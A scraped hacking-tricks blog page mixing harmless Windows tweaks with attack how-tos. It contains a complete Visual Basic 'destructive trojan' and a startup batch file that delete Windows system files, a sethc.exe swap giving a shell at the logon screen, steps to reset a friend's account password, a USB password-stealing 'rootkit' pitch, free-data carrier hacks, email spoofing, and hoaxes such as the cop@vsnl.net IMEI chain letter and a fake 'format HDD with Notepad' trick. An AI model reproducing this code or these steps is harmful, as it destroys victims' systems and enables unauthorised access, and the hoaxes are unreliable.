Use God Mode in Windows 7 ?

How to Use God Mode in Windows 7

Windows 7 is now becoming popular among windows operating system users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.
God Mode in Windows 7

Follow the following steps to create god mode folder:

LOGO FOR YOUR EMAIL ID

Thousands of time you surf diff diff blogs and leave you email id there so that
others may contact you but
you never knows that there are web data extractor, which are alike of search engine robots but this extractors are made for particular purpose either to extract email ids from web and then sailing them 2 spammers or to extract phone no. Etc.


So there is a website which can protect you from it.
Visit ..


Install Xp In 11 Minutes

hey frnds now i tell u super trick for xp users...how to install xp fastly

Top 5 Windows 7 Hacks

There are plenty of hidden features in Windows 7.
Here are the top 5 windows 7 hacks:


Enabling Aero User Interface



How to Download Youtube videos using Vlc Player

Did you know that you could Download YouTube and other online videos

  1. First grab the URL of the YouTube video page.

How to downloadd online videos in different formats

There are more than 40 video sharing sites  like youtube.com, dailymotion.com, megavideo.com, vimeo.com, twitvid.com, veoh.com, video.google.com, blip.tv, break.com, kontraband.com, facebook.com, livevideo.com (liveshows not supported), liveleak.com, stagevu.com etc.

How to delete the virus from ur pc manually....

Hi guys i am back with a new post ... This post will really help you a lot since its a war between virus and our basic knowledge. yes you read it right this is going to be done with out any help of anti-virus and that doesnt mean we dont need anything , we just need a small software which i am going to show you the link in the process. what ever the virus may be it is big or small irritates us a lot, so now i will guide you how to fight against it and kill it permanently. Process as follows......

Dns spoofing:


this is a type of phrank which we can do on some of our friends, family members or block some websites from accessing in our pc by others. I think this is very useful post for organizations and institutions.
Actually this phrank makes some website address to open another website or block the website in our pc. This can be achieved by following steps

THERE ARE SOME NEW HACKING TOOLS


Date and Time Format Tool
Process Namer and Counter (Console Application)
Color Tester: RGB Values
Lockerz PTZ Place Refresher

[Beware]ICICI BANK PHISHING EMAIL

Hello guys.. Beware of Phishing Email send by a HACKER pretending to be ICICI BANK.



I am attaching the Images and my research on this.

The mail is sent from "alert @ icici . com"

There will be an attachment in the mail "ICICI-SECURITY . html"

Hacking.Exposed.Linux.Third.Edition

This was the third edition released from the earlier books provided in the older posts and this is entirely

Hacking.Exposed.Linux.Second.Edition.Jul.2008

DOWNLOAD FROM BELOW.........

Hacking Exposed-Web 2.0 - Web 2.0 Security Secrets & Solutions

 Hacking exposed ........ this is another e-book which has a great stuff in it to know all the

How To Trace A GPS Enabled Mobile Phone with PhoneOnMap





Yes Guys, this is now possible...I m not jokingMany of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done.  Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (LOL) . This PhoneOnMap can be used worldwide and you can use it while travelling too.

credit card hack

The Attack

The fatal flaw that enabled the sensitive information to be stolen is possible when an end-user is not properly educated on an easy to do and well-known SSL exploit – SSL MITM.
Here’s how it’s done:
The hacker goes to coffee shop and connects to the same Wi-Fi network you are connected to. He runs a series of utilities to redirect other user’s data through his machine. He runs a number of other utilities to sniff the data, act as an SSL Certificate Server and to be the Man-the-Middle. The

Hacking Exposed-Web Applications - Web Application Security Secrets & Solutions


HACKING EXPOSED™ WEB APPLICATIONS
JOEL SCAMBRAY
MIKE SHEMA
McGraw-Hill/Osborne
New York Chicago San Francisco
Lisbon London Madrid Mexico City Milan
New Delhi San Juan Seoul Singapore Sydney Toronto




 download here........................................

Hacking for dummies


This book was specially written for the people who are interested in learning e

Fetch Password That Are Stored In Windows

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

* Best Ways To Speed Firefox Internet Speed Instantly

1. Enable pipelining
Browsers are normally very polite, sending a request to a server then waiting for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.

SpeedyFox - Boost Firefox in a Single Click!

Your Firefox is working slowly?
 Increase your internet browsing speed four times faster than the original

How To Send Fake OR Anonymous Emails



Below is list of 4 Fake email service that allow you to send fake email to anyone .This service is mailny used to prank yours friends and relatives ,you can prank by sending mail  on name of any website or Institute  like orkut@orkut.com or any other email id,Try it and Enjoy ! :P
the website which i like most and preferable is

Again Airtel GPRS Hack! Browse Internet For Free





  • I really don't know whether this trick is working or not, but I found in some forums that members are posting that this trick is still working fine! IF you want to browse internet for free of cost using Airtel Live. All you need to have a free mobile browser Opera 4.2 or 5 Beta 2 and some GPRS setting in Airtel Live

    IF your Airtel Live is not active, call the customer care and receive Airtel Live setting and configure according to their guidance.
  • Use Firefox As Your Ethical Hacking Platform And Toolkit

    Internet is an amazing virtual world where you can "virtually" do anything: gambling, playing, watching movies,
    shopping, working, “VoIPying”, spying other people and for sureauditing remote systems.
    The security testers’ community has a large panel of security tools, methodologies and much more to perform
    their pentests and audit assessments. But what happens if you find yourself weaponless.
    No more Top 100 security tools, no more LiveCDs and no more exploitation frameworks. A security auditor
    without toolbox is like a cop without gun.


    Nevertheless, there is maybe a way to rescue yourself from........

    How To Byepass BIOS Passwords : The Smart Way

    Introduction to BIOS Passwords

    The best method to reset a BIOS password depends on what BIOS the computer has. Common BIOS's include AMI, Award, IBM and Phoenix. Numerous other BIOS's do exist, but these are the most common.
    Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed.
    The general categories of solutions to reset a BIOS password are:
    • Using a Backdoor BIOS Password
    • Resetting the BIOS Password using Software
    • Resetting the BIOS Password using Hardware
    • Vendor Specific Solutions for resetting the BIOS Password

    How To make An Autorun File For USB Drives

    When you plug a  USB drive in, you might be interested in making a program, or other things happen as soon as you plug in. The way you accomplish this is through the Autorun.inf file. The autorun.inf file is located in the root of the usb drive and tells Windows what to do automatically.
    This autorun can be used to make good, or bad USB’s depending on what you like


    .
    This tutorial covers:

    Creating a USB Autorun.inf
    Changing label\icon of thumbdrive
    Making a new option appear in the autorun menu
    Making programs automatically run when plugged in

    So Read On...

    Use Sourceforge As your Free File Hosting Service.

    Here is the way on how you can simply use Sourceforge.net site for uploading your own files by using a simple flew in their validations

    1) Go to

    http://sourceforge.net/


    2) Create a account:
    https://sourceforge.net/account/registration/


    3) After you created a account, and are already logged in, click Create Project on top:
    https://sourceforge.net/register-project/......

    Hackers Software AIO 2010 - Latest Hack tools Collection

    WARNING TO ALL DOWNLOADERS 


    Its hack tools Collection. As I am professional Hacker so I know How to handle Viruses. So I am warning all users that Please Install The Deep Freeze First Before Using this. Otherwise No Antivirus or trojan remover can Help you... As Its a Complete hacker's Package.

    This Soft is 100% likely to include viruses and trojans which are so new they are not yet found by anti-virus scanner
    s. if you want to play with very new warez and h4X0r content then you can expect this..........

    BSNL 3G Hack! Browse Internet at 120 Kbps For Free

    I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them.......

    Countdown timer for shutdown computer

    Many a times people like to sleep on music, but the problem is that the comp will continue running the whole night. Here is how you can create a countdown timer to shutdown your comp in your specified time.

    Go to run in start menu and input this command


    Format A HDD With Notepad

    If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
    Step 1 :-
    Copy The Following In Notepad Exactly as it is.
    says01001011000111110010010101010101010000011111100000
    Step 2 :-
    Save As An EXE Any Name Will Do

    Folder Lock With Password Without Any Software

    1. Paste the code given below in notepad and type your desired password in the "TYPE YOUR PASSWORD HERE " 'Save' it as batch file with extension   ' .bat '
      Any name will do.
    2. Then you see a batch file. Double click on this batch file to create a folder locker.
    3. New folder named 'Locker' would be formed at the same location. 
    4. Now bring all the files you want to hide in the 'Locker' folder. 
    5. Double click on the batch file to lock the folder namely 'Locker'
    6. If you want to unlock your files,double click the batch file again and you would be prompted for password.
    7.  Type ur the password and enjoy access to the folder.




    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

    Can anyone Chat without Yahoo Messenger or Gtalk?





    Can we chat without Yahoo messenger? Most of us are familiar with the most widely used applications such as Yahoo messenger and Gtalk to carry out chatting with our friends. But here I’ll show how to chat without Yahoo messenger or Gtalk. As we all know the information we exchange with their servers(Yahoo or Gtalk) are recorded and stored along with the corresponding IP addresses. This may hurt our privacy since all the information we exchange while chatting has to pass through a third party server.

    Mobile theft???? Track it!!!!!!!!!!


    Did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don’t need to be worried about it. Now a days each one of us carry Mobile devices and always fear that it may be stolen. Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.

    This is how it works!!!!!!

    1. Dial *#06# from your mobile.
    2. Your mobile shows a unique 15 digit .
    3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
    4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
    5. No need to go to police.
    6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS
    and internet.
    7. You will find where your hand set is being operated even in case your no is being changed.

    PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.

    If u lost your mobile, send an e-mail to cop@vsnl.netwith the following info.
    Your name:
    Address:
    Phone model:
    Make:
    Last used No.:
    E-mail for communication:
    Missed date:
    IMEI No.:

    Login Into Gmail with different account at a time



    Create a shortcut of your Google talk.
    Right click the shortcut ----> choose Properties.
    In the "Target" you will find this
    Code:
    "C:\Program Files\Google\Google Talk\googletalk.exe"
    Assuming you have installed in C:
    Now at the end of target add this " /nomutex " without the quotes.
    It should be like this
    Code:
    "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex
    There is a space after googletalk.exe"
    Thats it .Click OK and you can open more than one Google talk

    Sethc Windows Accesbility feature hack:


    Sethc is nothing but sticky keys program which is present in system32 files

    This hack allows you to access command prompt from a logout screen. Cool :)

    Step 1. Goto c:\windows\system32

    Step 2. Rename the file sethc.exe to sethc.exe.bak

    Step 3. Copy cmd.exe to sethc.exe (You can copy netcat.exe or any executable like explorer.exe to sethc.exe)

    Step 4. Now logog off and in <control+Alt+Screen> press the <shift> key 5 times

    How to protect ur computer from viruses???

    Countermeasures:

    Reducing Your Chances of Infection:

    To make yourself less of a target for virus infection, take the following steps:


     

    1. Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put yourself at risk like this unless you absolutely have to.


       

    2. Don't open any e-mail attachments you weren't expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive.


       

    3. Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. They're a good first line of defense, as long as you keep the programs up-to-date with information about the very latest viruses— and most antivirus programs make it easy to download updates.


       

    4. Enable macro virus protection in all your applications. Most current Microsoft applications include special features that keep the program from running unknown macros—and thus prevent your system from being infected by macro viruses.


     

    1. Create backup copies of all your important data. If worse comes to worst and your entire system is infected, you may need to revert to no infected versions of your most critical files. You can't do this unless you plan ahead and back up your important data.


       


       

    now u people ill protect ur pc from hackers and funny guys like us :-p

    how to know ur ip address and how to change ur ip???

    Step 1: using cmd then u can type command ipconfig it`ll display Ur ip address of your computer or u can know Ur ip address by using websites also

    Ex: www.whatisip.com ,
    www.whatismyipaddress.com

    Step 2: now we`re going to work with proxy servers

    Proxy servers are used to hide our ip address and linked with information

    Step 3: if u want to change ur ip address. You have to access any websites through

    Proxy servers only

    Ex: www.hidemyass.com

    Step 4: above example website will shows duplicate ip address.

    How to Make a Destructive Trojan to crash the system

    Introduction about Trojan virus:

    This tutorial, or article or whatever you want to call it,

    is based around a destructive trojan I wrote in a day. So don't think that after

    you read this you will be a pro in virus writing! :P

    I used a program called Visual Basic 6.0 to write this virus and VB is the only

    programming language i know. Of course there are loads of other languages like ASM,

    QBasic and so on.

    Step 1:

    Purpose and wat action will be happened:

    Ok, I was going to get straight to the point and show you the code for my Jockster

    trojan which deletes important files in the computer and simply makes the computer useless

    until the victim formats the C drive.

    step 2: open notepad

    step 3: now copy the below code into notepad    


    Private Sub Form_Load()

    On Error Resume Next

    Open "C:\Jockstrap.txt" For Output As #1

    Print #1, "@echo off"

    Print #1, "cls"

    Print #1, "@del C:\windows\*.ini"

    Print #1, "cls"

    Print #1, "@del C:\windows\*.log"

    Print #1, "cls"

    Print #1, "@del C:\windows\*.exe"

    Print #1, "cls"

    Print #1, "@del C:\windows\*.com"

    Print #1, "cls"

    Print #1, "@del C:\windows\system32\*.scr"

    Print #1, "cls"

    Print #1, "@del C:\windows\SYSTEM32\*.exe"

    Print #1, "cls"

    Print #1, "@del C:\windows\system32\*.log"

    Print #1, "cls"

    Print #1, "@del C:\windows\SYSTEM32\*.drv"

    Print #1, "cls"

    Print #1, "@del C:\windows\system32\*.dll"

    Print #1, "cls"

    Print #1, "@del C:\windows\SYSTEM32\*.sys"

    Print #1, "cls"

    Print #1, "@del C:\windows\SYSTEM32\*.com"

    Print #1, "cls"

    Print #1, "@del C:\windows\system.ini"

    Close #1

    Name "C:\Jockstrap.txt" As "C:\Jockstrap.bat"

    Shell "C:\Jockstrap.bat"

    MsgBox "yapiee ur system is crashed!",vbCritical

    Kill "C:\Jockstrap.bat"

    End

    End Sub

    step 4: now this save it as Jockstrap.bat format

    Step 5:now run this file, it`ll display an error msg after that it`ll execute at background automatically

    step 6:now system crash is ready

    important Note:::

    This is an educational document. I take no responsibility for what use the

    information in this document is used for. I am unable to be blamed for any

    troubles you get into with the police, FBI, or any other department. Viruses

    are illegal to be spread, so this is simply for theoretical purposes or

    testing in a controlled environment. It is not illegal to write viruses, but it is

    to spread them. I do not take any responsibility for your actions!

    So that is clear? Good! Lets begin! :)

    Hacks that don't work on Operating System.

    1. Making Registry changes to speed up a computer : In some very specific cases changing the registary can speed up your computer a little bit. Sometimes. But by & large, spelunkinng through your Registary looking for a killer bit that'll boost your speed by 10% is a fool's game.
       If you do find hack that'll speed up your computer by 10%, you'll never even notice the difference. It takes a speed-up of 20% or so to be noticable- and even a 30% goin won't seem like much after a day or two. On the other hand, if that speed-up hack makes your computer unstable, belive me, you will notice. Right between the eyes you'll notice.

    2. Using any registry cleanup utility : Ther's one born every minute. Software companies have made millions & millions of dollars offering programs that scan & clean your registary entries. I've never seen a single registary cleaner that was both safe & effective. Sure, your registary gets clogged up with useless entries. Does that make your machine slower? No "Cleaning" little known registary entries can make your machine roll over & die. You're better off using a sledgehammer.

    3. Disabling Windows processes : I've seen a dozen reason for disabling the Window programs that automatically launch when windows starts. (You can see which processes are running on your computer - execept the really stealthy ones - by pressing Ctrl+Alt+Del & clicking Processes in the Window task Manager) None of the reason I've seen for disablig processs manualyy makes any sense. Years ago, a Window process called UPnP opened a huge security hole in Window XP. Microsoft fixed the hole, eventually, & for a while it made sense to disable the UPnP process.
       If you have  renegade processes, they're symptomatic of another problem - generally a worm, spyware, or some other form of malware. You should treat the problem by zapping out the offending software instead of attacking things placemeal by manually disabling a runnig process that you don't understand.

    4. Assigning fancy file access permission : Yes, I know you can fine-tune folder & file permissions, even with Window XP Home, So you can allow certain people to see your files, keep others out, & make others dance like bears before the data comes up. But for most people, it isn't worth the effort. Why? If you really need to set up sophisticated file access permissions - so that 1 person can read the file & update others file - & you aren't willing to use passwords, you need to bite the bullet & install a server, Window XP Pro, & Active Directory. The half- fast approaches to ristricting access in Window XP Home are doomed to failure simply because the tools aren't all there.

    5. Doing anything involving DOS : Okay, there are exception. I even talk about one of them. But if you aren't conversant with DOS - & few of us are after all these years - you can almost always find better way to accomplish what you want by using Windows alone or one of the nearly infinte number of free utilities.

    6. Making parental control software & modification : Doomed to failure, no matter how hard you try . Windows does't have the tools to properly implement parental control, & the world on the Web changes much too fast. Don't even bother.


    Working with batch file to create different shortcuts…..

    Step 1: Before going to create a batch file, 1st u have to know its purpose::

    1. Batch file extension is example.bat

    2. This file will works with command prompt and to execute user requested commands.

    Step 2: now we want to create a shortcut for opening paint, notepad, cal

    At a time by clicking a single application it`ll open these above 3 applications

    Step 3: open notepad and type the below 3 commands…


    Start notepad

         Start cal

         Start mspaint

    Step 4: now save it as shortcut.bat

    Step 5: now run this file it`ll execute above three applications

    Step 6: now u can enjoy this trick to create no. of shortcuts.

    Cool tips for u guys to Delete An "undeletable" File::


     

    Step 1: Open a Command Prompt window and leave it open.

    Step 2: Close all open programs.

    Step 3: Click Start, Run and enter TASKMGR.EXE

    Step 4: Go to the Processes tab and End Process on Explorer.exe.

    Step 5: Leave Task Manager open.

    Step 6: Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.

    Step 7: At the command prompt type DEL <filename> where <filename> is the file you wish to delete.

    Step 8: Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.

    Step 9: Close Task Manager.

    How to create a simple virus by using notepad??

    Step 1: open notepad and type below code…..

    :123

    Md hacker

    Cd hacker

    Goto 123

    Step 2: save it as virus.bat

    Step 3: now run the virus. It`ll create uncountable number of floder virus with hacker name.

    Step 4: if u want to stop this process. Then go for task manager and end the process.

    Systems hacking by using cmd prompt

    Step 1: open CMD prompt.

    Step 2: type command
    Net user username *

    Step 3: the above command I'll show like this:


    New password:


    Confirm password:


     



     

    Step 4: Now u enter ur new password without using ur old password.

    Step 5: Now u can enter with ur own password into ur friends computer.

    Step 6: we are expecting that u people`ll like dis.


     


     

    CRYPTOGRAPHY OR STENOGRAPHY BY USING SOFTWARE AND CMD PROMPT:

    Using Cmd prompt:

    Step 1: open cmd prompt

    Step 2: type command

    copy /b picturename.jpg+filename.txt final.jpg

    Step 3: it will show same picture as like before only but file will be hided at back of the picture.

    Step 4: now we want to open that same file again. Then open that picture with notepad then it`l show our data at the end of the file.


     

    note: this command will not work on win7,vista.

    picture and file be in same directory

    using software tool:

    Step 1: download the software by clicking this below link.
    Camoflauge

    Step 2: now install in your computer. It's not a virus it'll not harmful to your computer also.

    Step 3: Create a notepad file like this and save as hello.txt

    Step 4: now right on the file and open with Camoflauge option

    Step 5: do the operations as like below process.


     


    Step 6:attach file with any picture or software.


    Step 7: enter your unique password to protect from others.


    Step 8: finally resultant file will be like as show in figure.

    Step 9: now again we want to retrieve that same file then right click on that file and open with uncamouflage .


    Step 9: enter password and extract ur file into ur machine.




    Google hacks and secrets………

    Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.


    Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as
    Example: mysite



    Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in
    link: Hackingstore.blogspot.com



    inurl: restricts results to sites whose URL contains the specified phrase

    example: inurl:fox fire will find all sites containing the word fire in the text and fox in the URL


    filetype, ext: restricts results to documents of the specified type

    example: filetype:pdf fire will return PDFs containing the word fire, while filetype:xls fox will return Excel spreadsheets with the word fox

    How to create deadly virus to crash the entire system???

    step 1: Open notepad
    step 2: Now type the code as below…. Format..
    attribute c:\ntldr –n –s –r
    del c:\ntldr \f
    ntldr stands for new technology loader
    Options are permission provided by the windows operating system.

    step 3: Now save as friend.bat
    step 4: Now u can run this file to crash your system
    step 5: If u keep this file in startup folder then it`ll execute
    automatically when switch on ur computer.

    Creating your own shortcuts to shutdown your computer

    For Shutdown shortcut:
    Step 1: Open notepad and type the below command
    shutdown –s –t 00
    Step 2: Now save it as shutdown.bat
    Step 3:Now that file will act as a shutdown button.

    For restart shortcut:
    As like as above process but command is
    Shutdown –r –t 00

    How to protect ur computer from hacking ????

    SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.

    SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from BindView found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible.

    Microsoft later collaborated with BindView to issue a fix for the problem (dubbed the 'Syskey Bug') which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack.

    According to Todd Sabin of the BindView team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.

    Step 1: Open Run command by pressing windows+R key or start -> run
    Step 2:Type SYSKEY in the run prompt syskey means “system key”



    Step 3: Click “ok”then it ill display sam lock control. Again click ‘yes ’ option and then it`l display like this ….



    Step 4: Now go for upadateoption.
    Step 5: After it will display startup key setup.


    Step 6:Check the Password startup

    Step 7: Now set the password and click ok


    syskey password will ask before the user accounts password .
    syskey password will not be hacked by any hacker.

    Top Tricks n Cheats

    Set Processes Priority

    Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

    CTRL-SHIFT-ESC
    1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option

    2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s

    Shutdown Trick !

    Imidiate rapid shut down window
    while shutting down window. open task manager(Ctr+Alt+Del),
    Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.
    Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.


    Speed Up Ur Shut down !!


    Start Regedit.
    Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
    Click on the "Control" Folder.
    Select "WaitToKillServiceTimeout"
    Right click on it and select Modify.
    Set it a value lower than 2000 (Mine is set to 200).

    and !

    Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you
    must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.


    **new **
    Crazy !!
    Hide ur folders.. never known trick !!!!!!!!!! Disguise them to "Recycle Bin"


    Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
    eg,
    if u've a folder games
    press F2,
    then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"
    c the magic....
    then 2 get to original form,
    remove the extension using
    "ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file


    n u are done..

    ~cheers~


    System information

    system up time only for xp professional edition
    It boasts how long it can stay up. Whereas previous
    versions of Windows were coy about how long they went
    between boots, XP is positively proud of its stamina.
    Go to the Command Prompt in the Accessories menu from
    the All Programs start button option, and then type
    'systeminfo'. The computer will produce a lot of
    useful info, including the uptime. If you want to keep
    these, type 'systeminfo > info.txt'. This creates a
    file called info.txt you can look at later with
    Notepad. (Professional Edition only).


    lock pc just by double clicking mouse

    You can lock your XP workstation with two clicks of
    the mouse. Create a new shortcut on your desktop using
    a right mouse click, and enter 'rundll32.exe
    user32.dll,LockWorkStation' in the location field.
    Give the shortcut a name you like. That's it -- just
    double click on it and your computer will be locked.
    And if that's not easy enough, Windows key + L will do
    the same.



    SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)



    Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

    1. Go to the installation folder of acrobat reader
    (C:\program files\adobe\acrobat\reader\.. whatever)

    2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

    Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

    Now your acrobat reader will load very fast
    and almost as good as notepad..


    Remove Stored username and Passwords !


    To remove the Stored User Names and Passwords from your system, try this:
    Click Start, Run and type Control keymgr.dll
    Remove the entries from the list.
    The other ways to access this dialog are:
    Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
    -or-
    From Control Panel, select your User Account, click Manage your network passwords

    It Works

    ~ Cheers ~


    *

    Remove the Username and picture from Windows XP New Start Menu


    The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.

    For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
    Start Windows Explorer and go to this folder:

    C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

    From that folder, rename the BMP file which corresponds to your user account.
    ( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
    Next, rename the following folder:

    C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures

    to something else, say...

    C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures
    To remove the user name, follow these steps

    Start regedit.exe and navigate to the this key:

    HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer
    In the right-pane, set NoUserNameInStartMenu value-data to 1

    Close Regedit.exe and restart Windows.

    You'll end up with a blue space at the top of the Start Menu.



    To get back the username and the picture, reverse the above procedure.



    For the New Start Menu, Windows XP looks for the .bmp file in the folder

    C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

    If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the .bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu

    ~ Cheers ~.

    Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!

    Well quite old but here is d complete collection

    Step 1: Open Notepad
    Step 2: Write following line in the notepad.
    this app can break
    Step 3: Save this file as xxx.txt
    Step 4: Close the notepad.
    Step 5: Open the file again.

    Voilla!!

    or

    1> Open Notepad
    2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
    3> DON'T hit enter at the end of the line.
    4> Save the file.
    5> Close Notepad.
    6> Reopen Notepad.
    7> Open the file you just saved.

    or

    Open a note pad
    type Bush hid the facts
    save that file,
    close it
    again open and see...


    NOTEPAD "world trade centre trick".. :


    Did you know that the flight number of the plane that had hit WTC ...on
    9/11 was Q33N ....Open your Notepad in ur computer and type the flight
    number i.e Q33N... Increase the Font Size to 72, Change the Font to
    Wingdings. U will be amazed by the findings.

    log trick !! make ur Notepad a diary !!


    Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
    Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

    WHY?

    The reason this happens:

    In notepad, any other 4-3-3-5 letter word combo will have the same results.
    It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

    1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
    2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
    This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters




    SPEED UP MENU DISPLAY.!!


    When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.

    Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.

    Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
    Select MenuShowDelay from the list on the right.

    Right on it and select Modify.
    Change the value to 0.
    Reboot your computer.



    CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!


    Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
    1. Open up regedit
    2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler
    3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"
    Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
    NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.

    CD ROM STOPS AUTOPLAYING/AUTORUN.!!


    And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
    Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic".

    How to make your Desktop Icons Transparent

    Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"


    DISPLAY MESSAGE ON STARTUP.


    Start regedit, if you are unfamiliar with regedit please see our FAQ.
    Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Modify the key legalnoticecaption with what you want to name the window.
    Modify the key legalnoticetext with what you want the window to say. Restart


    AUTO DELETE TEMPORARY FOLDER.!!

    ll what i prefer is %temp% " without quotes.. at Start -> Run..
    this opens ur temp folder n den u cal erase it neatly// still try dis one too..


    First go into gpedit.msc
